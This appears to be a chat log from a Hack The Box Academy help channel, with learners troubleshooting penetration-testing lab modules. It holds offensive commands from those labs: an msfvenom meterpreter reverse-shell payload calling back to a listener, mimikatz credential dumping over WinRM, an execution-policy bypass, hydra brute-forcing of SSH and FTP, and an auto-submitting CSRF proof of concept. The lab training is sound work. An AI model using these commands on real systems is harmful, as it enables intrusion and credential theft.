gobuster vhost -u inlanefreight.local -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 -k -q
Found: 1 Status: 400 [Size: 436]
Found: 11192521403954 Status: 400 [Size: 436]
Found: 11192521404255 Status: 400 [Size: 436]
Found: gc._msdcs Status: 400 [Size: 436]
Found: 2 Status: 400 [Size: 436]
Found: 11285521401250 Status: 400 [Size: 436]
Found: 2012 Status: 400 [Size: 436]
Found: 11290521402560 Status: 400 [Size: 436]
Found: 123 Status: 400 [Size: 436]
Found: 2011 Status: 400 [Size: 436]
Found: 3 Status: 400 [Size: 436]
Found: 4 Status: 400 [Size: 436]
Found: 2013 Status: 400 [Size: 436]
Found: 2010 Status: 400 [Size: 436]
Found: 911 Status: 400 [Size: 436]
Found: 11 Status: 400 [Size: 436]
Found: 24 Status: 400 [Size: 436]
Found: 10 Status: 400 [Size: 436]
Found: 7 Status: 400 [Size: 436]
Found: 99 Status: 400 [Size: 436]
Found: 2009 Status: 400 [Size: 436]
Found: www.1 Status: 400 [Size: 436]
Found: 50 Status: 400 [Size: 436]
Found: 12 Status: 400 [Size: 436]
Found: 20 Status: 400 [Size: 436]
Found: 2008 Status: 400 [Size: 436]
Found: 25 Status: 400 [Size: 436]
Found: 15 Status: 400 [Size: 436]
Found: 5 Status: 400 [Size: 436]
Found: www.2 Status: 400 [Size: 436]
Found: 13 Status: 400 [Size: 436]
Found: 100 Status: 400 [Size: 436]
Found: 44 Status: 400 [Size: 436]
Found: 54 Status: 400 [Size: 436]
Found: 9 Status: 400 [Size: 436]
Found: 70 Status: 400 [Size: 436]
Found: 01 Status: 400 [Size: 436]
Found: 16 Status: 400 [Size: 436]
Found: 39 Status: 400 [Size: 436]
Found: 6 Status: 400 [Size: 436]
Found: www.123 Status: 400 [Size: 436]
I am trying ffuf as well, it's taking 3 req/sec
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://IP -H 'Host: FUZZ.target.htb'
It's really very very slow
It shouldn’t be
Thanks I will see what i can do 😉
hi, what sections should I reread for each of the three Password Attack Labs at the end of Password Attacks module?
I mean I know the whole module but what sections corresponds to each Lab?
That would be spoiling the skill assessments for yourself
Or have u already finished it and just asking?
oh I see so the skill assessments assume I'm rereading previous sections
ok
thanks, I'll just look them up myself
I don't want to spoil it.
I wanted to review the material so I can do assessment but if the assessment is just essentially the whole module over again I guess I'll just reread
thank you
ok ya I didn't realize that I thought the skill assessments would require me to figure out how to hack stuff based on material from module and not necessarily just have me rehash the whole module
ok
I will just do the skill assessments tomorrow then
should I just reread entire module?
in like two days?
just to review everything?
Yeah you should be able to complete it using what you learned
ok
so does that mean rereading is a good idea to reinforce?
You don’t have to memorize and remember everything, that’s what notes are for
Just know when and what tool to use in a situation
I took very detailed notes
The modules should prepare you
skill assesment is just to confirm you have learned and are able to use what you have learned
ok
I need help with the web attacks module mass idor enumeration, I tried creating the bash script in nano and then running it and I'm not getting any response or downloading any files it just hangs there
iirc the example script had one difference in the request compared to the question
You will have to edit it a little
well im not getting any responses regardless
like its not enumerating the pdf files either
im not sure if theres something wrong with how im running the script or something
ok so I put the uid in the post parameter and changed the file extension to .txt and still didnt get the flag
i dont understand what im doing wrong here. I'm able to download all the pdfs but when I change the file extension to .txt I get nothing
Dm me the script
I don’t think the extension mattered since it used regex to grab anything after
But I can’t remember exactly what the script looked like ngl
can anyone help me understand where my mind should be on kernel exploit section of linux priv esc?
I don't know what im doing wrong 😦
i dmd you the script. im not sure what im doin wrong
im able to download all the pdf files
and I changed extension to .txt
i got it. I had to use the verbose setting for wget and then curl the url directly to read the flag
CAN SOMEONE PLEASE HELP ME RECOVER MY YAHOO ACCOUNT
yahoo can. reach out to them.
I'm doing skill assessment 1 for active directory enumeration and attacks and when i try to run an msfvenom meterpreter/reverse_tcp payload on MS01 i get "The specified executable is not a valid application for this OS". I get this error message with both 32 and 64 bit executables
sounds like you generated the payload incorrectly, make sure you choose windows and not arm
im generating the payload with
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.6.100 LPORT=8080 -f exe -o reverse.exe
the ip is weird because im doing it through ligolo listener
actually, i just realised that im getting connection refused
Why are you using both ligolo and meterpreter?
i wasnt planning on using meterpreter but the evil-winrm shell is giving me problems, mimikatz just goes wild and floods the terminal with prompts
That's normal, it's why on winrm you need to throw the command at it instead of trying to run it from within
You can just type the commands like this: mimikatz.exe “privilege::debug” exit
^
ah i see, thanks!
It's mostly because winrm sucks ass but evil-winrm is the best we got i suppose
would this be happening because the executable reaches out to msf to get the full payload, but msf doesn't know there's a proxy and so gives it my local ip which the remote host can't connect to?
One time I had to reinstall my OS because it wasn't seeing that openssl was installed
Nope the payload is generated with the exact specs you give it
In the winrm/ps prompt ->
set-executionpolicy bypass -scope process
Also connection refused; likely some firewall shenanigans on your end
Or on the middle host
hm ok, i guess metasploit doesn't mix too well with ligolo
What is the FQDN of the host where the last octet ends with "x.x.x.203"?Does any know how to this question I'm stuck with it -- DNS -- Footprinting -- Penetration path
It does just fine you just have to configure things correctly. https://youtu.be/EvENMuvxPW0?si=87pwPRAZQgln0krV
ok bruh somethings definitely up. I know i could progress without it by using mimikatz but i want to get this working.
I set the execution policy to bypass and both the system and payload are x64
iirc you need to recursively query the subdomains as well, one of them will have the ip ending in .203
Subdomains of Subdomains
@tulip hearth module and section name?
module/57/section/503
im trying to bruteforce the site but idk which user to use
should i also use a wordlist for the username?
cuz i kept trying with basic-auth-user as username
Login Brute Forcing
Basic HTTP Authentication
I just redid this SA.
I would say to not use MSF, but that's on me... Idk
All the lateral you need and the sessions you will need you can use evil-winrm, Impacket and Netexec
never understood why some people say the module and section numbers instead of their names
Cause you can paste in the URL
Because they just copy the url endpoint
ugh the rdp is failing again
But I find it easier to reference via section and module name as well
Name and section helps from my notes perspective
for referencing notes too, i don't have the module and section numbers there either
This is because WinRM uses HTTP/HTTPS to pass commands.... You can try setting the commands you want to pass all in the parameters and then 'exit'
But you can go through this SA with both MSF, mimikatz, evil-winrm, netexec and whatever you choose
I went through my old notes and I used MSF without issues
I can check if I used MSF in the attack host set by the module but most of the stuff in Academy has the routing setup as to enable getting a callback in your machine
if my certificate verification failed for the RDP after switching regions should i just wait? i swapped regions earlier and it worked for a little bit but now it just refuses to work lol
Have you tried specifying the /cert-ignore flag?
like the error message it gives me? such as
In the rdp command throw /cert-ignore
change regions
i did and that solution stopped working me :/
When you change regions you need to stop your vpn and download/run a new one
And terminate -> reset the target
well i use the pwnbox so it gives me that pop up telling me that its going to do that. ok ill terminate the target
Pwnbox region != vpn region
OOOOH
annd the same error popped up. thanks yall for the help
not in an insincere way. i figure its something going on that im not seeing quite clearly yet
i swapped the vpn region to USacademy1 from USacademy6
once i get past the error connections i run into the trust issue with the primary domain after putting /cert-ignore in the CLI
i put the vpn server at EU academy 3
the trust relationship isn't related to the certificate
it's a problem with the domain and the computer, not something you can fix
someone else had the same issue earlier, changing regions fixed it. i'd suggest disconnecting from the eu vpn, de-spawning the target, doing a hard refresh on the page (ctrl+shift+r), re-spawning the target, and waiting 3-5 mins and try again
I'm new to hackthebox
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I have been trying to load this directory from last night but it doesn't load. Can anyone help please
I even tried switching vm but its not working
yep, i restarted the lab and it magically worked now 😕
hey
Kerberos Attacks > Unconstrained Delegation - Computers
i have ticket
Client: DC01$ @ INLANEFREIGHT.LOCAL
Server: krbtgt/INLANEFREIGHT.LOCAL @ INLANEFREIGHT.LOCAL
but when i want to access i got
C:\Tools>net view \\DC01\C$\Unconstrained
System error 5 has occurred.
Access is denied.
Hi. In the "File Inclusion" module, the following question is not working with the expect wrapper. The other two wrappers work fine. The command should work as shown in image2, but I don't see the result of "id", only HTML output.
hi and merry Christmas, first post here, anybody know why this doesn't show up in Burp proxy (it's a tmp HTB academy module)?
nmap --proxies http://127.0.0.1:8080 -p43343 -Pn -sC 94.237.61.84
proxychains nmap -p43343 -Pn -sC 94.237.61.84
But this does:
proxychains curl 94.237.61.84:43343
/etc/proxychains.conf
uses everything default, except:
#Quiet mode (no output from library)
quiet_mode
#socks4 127.0.0.1 9050
http 127.0.0.1 8080
Hello. I'm currently at Linux Fundamentals / Working with Web Servers and I don't understand some things about it. What exactly is a web server? Is it just a package that, when installed, kind of represents your IP as a web page? Why are there so many different web servers? And how do I "Find a way to start a simple HTTP server inside Pwnbox or your local VM using "php". Submit the command that starts the web server on the localhost (127.0.0.1) on port 8080."? Isn't PHP, like, a language? What's next, starting a web server from Vim?
You can start a HTTP server with PHP, also with other languages
Hi there, I am new at HTB Academy. I started a learning path. In the learning module I am doing right now I only have the option to use Pwnbox, but I would like to use the VPN instead. I apparently do not have the VPN option as stated here: https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn
Do not all learning modules have a VPN package, or is this a "subscription" thing? Thanks and regards
A web server is software that listens for client requests and serves web content, acting as the foundation for hosting websites and web apps.
The variety of web servers exists because different tasks and environments demand unique features, performance optimizations, or integrations.
Thanks but how exactly? I found php -S localhost:8080 but it doesn't work as answer
hmmm I haven't done the module personally. But you can dm me the question, and we can take a look together
I already said the question though.
have you tried 127.0.0.1 instead of localhost?
Oh it's that simple. Thanks, it works.
haha no worries
hey guys, i got a question about the dancing module in starting point
Best to ask in #starting-point
the report in AEN is giving me a headache lol.
it requires so much work.
when I finish it can I send it here to get feedbacks? or not allowed?
as this is the first time I write a report and I need as much feedback as possible before the actual exam.
Unfortunately this is not allowed
Injection attacks, LDAP authentication bypass: I used all variations mentioned in the section and still can't figure it out.
And why we are provided with the creds at the first place.
What is the question?
why though? it's a module not an exam
Because it's a tier 2 module, and sharing the report is the same as sharing a writeup
in HTB sharing writeups for tier 2 modules is not allowed? this is new knowledge.
thanks.
Yes, it's literally against ToS
Currently working through the Hacking Wordpress Skills Assessment. Using the techniques taught in the module have given errors, as the target that spawns is not detected as a Wordpress website by wpscan. Is anyone here able to give guidance on this?
Take a look at all the links. Not every website has to be a Wordpress
Use netcat
thanks
I believe the --script banner may also work
i had completely ignored the rest of the things and went too fast🤦♂️
Also careful sharing answers 😉
oh yeah sorry
Hey, in the DACL attacks 2 skill assessment proxychains doesn't work, any idea what's happening?
Login as admin using LDAP authentication bypass.
yep it does
Even though chisel is connected
And proxychains configured
I still get timeout
Some of the modules had timeout error when using proxychains.
It was resolved running with sudo
You can do it without the tunneling or setting it with ligolo
Ill try thanks
im doing win priv esc citrix section, anyone know why i still cant access internal resource after tunneling with ligolo?
its ok dumb ass me put the wrong ip in etc host
Lol i don't even recall i used pivoting in this section
For the Active Directory Path, I am having trouble answering the question for BlueHound. BlueHound does not return any data related to domain users with a path to domain admins? Any hints or nudges. I've followed the instructions for BlueHound and try to run custom cypher queries on bloodhound
i cant connect the citrix environment to my smb
Using BlueHound custom dashboard. What percentage of users have a path to Domain Admins? (Do not include %)
can anyone help out on the SCCM Auditing module?
I'm using sccmhunter, but not getting any info back on certain attributes - used all the different sets of credentials previously obtained, just can't figure out how to return info such as if the computer is an SMSProvider or not
Could you be a bit more precise? What are you executing? Do you have sufficient permissions?
If bloodhound is not getting data ill suggest 2 things:
First, check user credentials are valid
Second, go with sharphound, I really dont like the py version for linux, it misses stuff
I'm having the same problem, as well. Even when I copy and paste
for win priv esc citrix section, how can i transfer the powerview into citrix environment?
in the penetration tester job role path in the "Practice" Module:
2x Modules
3x Retired Machines
5x Active Machines
1x Pro Lab / Endgame
So for every 2 Modules it is recommended to complete 3 retired machines,5 active and one Pro Lab. Did I understand this correctly ?
It's explained in the module itself, read it it was through MS Paint from what i remember so you can use that as a search keyword.
cant access i already tried that UNC method
You probably did something wrong as it worked for me.
i got it thanks
no problem.
facing same issue, updated /etc/hosts with internal names as suggested - no luck :/
nvm its fixed
OK. I feel like I'm taking crazy-pills: working on the skills assessment for "File Upload Attacks". I've exfiltrated the source files, bypassed the allow and deny lists, I'm looking at the code as to where it's storing the file after it's uploaded but when I try to browse to it, the server is throwing 'not-found' errors... Am I missing something?
beyond "where the file is located"
Did you pay attention to how the file gets formatted before it's uploaded?
Doesn’t the rdp machine have it?
OK. I'll dig into that. Thanks.
are you referring to how it gets named?
Yep
The lab wants you to use bluehound and they give you the account and the data. Bluehound just won't correctly populate with it.
I'm having trouble with this last question on the Windows Attacks & Defense Credentials in Object Properties. I'm looking at the logs and I still can't find the TargetSID in the security logs. I found a workaround, all good.
Yes. I saw it and have taken that into account. Still 'not found'.
BlueHound uses sharp hound and a gui to grab the data and create dashboards. Some dashboards work but the ones I need do not.
It applied format_file
Don't forget the _
@fathom pendant yep, I've got that, too. Can I DM you directly about this?
I just did this one, what issue are you encountering?
I think that's where my confusion is coming in. I'm reading through the source code and it says that it's in ./upload_location_here/ suggesting that it's a subdirectory of the directory that the file is executing in, correct?
Hey, so I'm new here and I've got a question. I'm doing starting point machines and i tried connecting via openvpn and it seems my connection is working, but whenever i try to do something with a machine, be it nmap or whatsoever, it says that "host seems down" every time. I'd really appreciate any help
it seems that every starting point machine is down
what IPs are you seeing if you run "ip -4 a" ?
It's in the webroot iirc
Ight sorry ima go there now
Ya hahaha I thought too much
For several days, I've been experiencing frequent interruptions and disconnections within the 'Active Directory Enumeration and Attacks' module. This issue manifests on multiple machines within the module, with 'ACADEMY-EA-MS01' being a prominent example. I've tested with three major RDP clients (rdesktop, xfreerdp, and Remmina) and renewed/reset my VPN connection multiple times, but the problem persists. These issues are also occurring within the Parrot Pwnbox. Is anyone else currently experiencing similar issues?
Reach out to support, switch regions completely [EU to US academy 1-5/6 or vice versa]
Make sure tcp download on your vm
The examples don't always match the exercises. The examples can be there to show a process
If you read the question it refers to something more specific (and more likely to be linux)
for the windows attacks and defense print spooler & NTLM relaying I'm getting an error from impacket-relayx and it's not working... I'm running the script from the kali box and then when I run Dementor on the kali box from the Tools directory I'm running into errors, sigh..... figured it out. I manually typed out the password.
Hi I am not sure if this is the right channel, but I have reached the point where my monthly subscriptions has unlocked all academy modules on my path with cubes (I have some left over too) if I stop my monthly sub or reduce it do I still keep the content or do I need to keep it running?
you keep the modules you completed
You get to keep modules unlocked with cubes (regardless of whether you've completed them). However, modules unlocked via a subscription need to be completed in order to keep them.
Having Troubles Understanding this section:
Information Gathering - Web Edition
DNS Zone Transfers
How is this formatted? What goes where?
dig axfr @nsztm1.digi.ninja zonetransfer.me
Dig [query] [domain] @ nameserver
The name server can also be an ip
So it would be inlanewhatever.com @ IPADDRESS
Or .htb
Also no space between, I just put a space because some fucker's username is nameserver, so it'll fuck up
Context and question matters
on external information gathering module, on the last question in what format should the vhost be
since i found around 10 and no one works
*attacking enterprise networks module
I wouldn't worry about answering the questions until you achieve domain compromise
External info gathering section btw
Not module
but it is a question needed to go forward
it is the last in this section
Doing the module blind is best to make sure you actually retained info and have good notes and methodology
Which means not reading the module or doing the questions
As the questions can be leading
The module itself is a walkthrough
oh
Hi
It means [if you're doing the cpts path] you should have all the skills necessary to achieve domain compromise, then go back and answer questions
Friends, I have a question. I accidentally subscribed to HTB for a year. I intended to do so for a month. Is there a way to cancel this?
Need some help? Learn how to reach the support team on Academy.
lol
so first hack it?
but to what extent
i see
I haven't done everything up to this though
should I do the other modules first
I have two I haven't done
Docs & reporting is good if you want to do a report as you go
it is painful to stop
You may run into something on AEN that's related to file inclusions
doing htb as hobby not gonna burden myself with this crap
i mean just for the vhosts thing
Well if you want to do the cert it's best not to have your first time writing a report be for the exam
¯\_(ツ)_/¯
It's just looking for the subdomain word not sub.domain.tld
so hi.domain.id -> just type hi
The additional vhost it's referring to is the one not shown in the reading
But the other reason I advise doing the module blind is it feels immensely satisfying to do the module blind and compromise
yeah I will do it that way, I didn't know it should have been done that way
I suggest referring to other module notes instead of the direct module first
But i suggest continuing without reading more questions, as you can see the questions are leading
Idk if I can ask this here but I'm doing the skill assessment on: Information Gathering - Web Edition and I'm trying to get the mail addresses. I tried
dig {IP_ADDRESS/DNS} MX
and using ReconSpider. ReconSpider gives me a blank JSON file. Is there a reason for that?
python3 ReconSpider.py inlanefreight.htb:PORT
I configured my hosts file to the IP address given as well.
You need to specify a nameserver with @
The way dig works is its asking the nameserver if there's any record of the domain you're looking for
Otherwise it'll default to public nameservers, I believe
If there's nothing for ReconSpider to crawl then it's not gonna do anything
A blank json just means it didn't crawl anything
So I have to also add the name server to the dig? When I tried that it just said no server found
How did you specify
Ah nvm
added the @ IP
Nah, I tried Fuzzing for directories and got nothing back.
It's a public ip:port, so dns isn't likely running anything
That's why dig is failing
Also it's asking for a mail address of someone, not the mx record
Ah
I'll try to fuzz subdomains and see where that gets me.
Nothing happened. I am starting to think there's a configuration that's messed up on my end.
What's the command you're using to fuzz? I can almost guarantee that's the issue
dnsenum --enum inlanefreight.htb -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
I'm just using the ones that they tell us to use so let me find another one that is mentioned
Vhost enumeration is more apt for what you're looking for
Would something like ffuf work, replacing the prefix with FUZZ?
To fuzz vhosts you need to add -H "Host: FUZZ.example.com" to ffuf
hi, is this on the right track for the Easy Password Attacks Lab of the Password Attacks module?
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-ucmeghy0v8]─[~]
└──╼ [★]$ hydra -l root -P mut_pass.list ssh://10.129.202.219 -t 64
Ssh is super slow, maybe attack it in a different way
ok
I can't use WinRM only because it's not Windows, I don't think
The question is the end goal, not the start
can someone help me with the last step at Advanced XSS and CSRF Exploitation / Skills Assessment? I am not able to find the ||injection point|| and I already discovered the "hidden" endpoint
```html
<html>
<body>
<form id="submitMe" action="http://xss.htb.net/api/update-profile" method="POST">
<input type="hidden" name="email" value="attacker@htb.net" />
<input type="hidden" name="telephone" value="(227)-750-8112" />
<input type="hidden" name="country" value="CSRF_POC" />
<input type="submit" value="Submit request" />
</form>
<script>
document.getElementById("submitMe").submit()
</script>
</body>
</html>
```
how does this, served on a different domain than the one in the form, access the cookie of the different domain so that it is a valid request? thanks
is SMB faster?
An internal web server
If smb is running. Why not scan it and see
yeah but if it is served on a different page, wouldn't it be unable to access the cookie?
Not if the cookie is sent with the request
and how do we send the cookie with the request?
shouldn't we have to access the cookie in some way?
I mean browser tools you can access a cookie
I'm curious what module you're working on. File inclusion?
Weren't you just doing AEN?
I am not speedrunning the CPTS
Or did you finish the first page and jump to something else?
since I need to go through the other modules first
smb is not accepted but I think FTP is
but I don't wanna do it currently
so is this better?
```
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-ucmeghy0v8]─[~]
└──╼ [★]$ hydra -l root -P mut_pass.list ftp://10.129.202.219 -t 64
```
so i postponed both of them
I don't think session security is part of the path
it's not
But whatever works for you I guess
I suggest using nmap to scan targets
Not just guessing
ok
FTP and SSH are both open
according to a quick nmap scan
FTP is the faster of the two, I get that, but is hydra the best tool for cracking FTP?
Alright now start simple with ftp
ok
Don't jump straight to root
ok
Also sometimes scanning for more ports helps you find something that's not default
:p
should I use a general username list instead of the root user?
You're skipping basics and want to jump straight to what the question asks
ok ya I see
Think of it as a blank canvas, assume you know nothing about it
ok
should I not brute force the root user via FTP? Instead, would it be better if I tried the entire username list to get any user, then escalate privileges?
I believe footprinting and common services are before password attacks
At the very least footprinting
Start from the basics of enumerating a port/service
ok
so don't stop with a short nmap scan, instead try to get more ports?
-p-
ok
The skills are building blocks
I did this:
ffuf -H "Host: FUZZ.inlanefreight.htb" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt" -u http://inlanefreight.htb:36571
I got a lot of 200s. Just making sure this is correct.
ok thanks
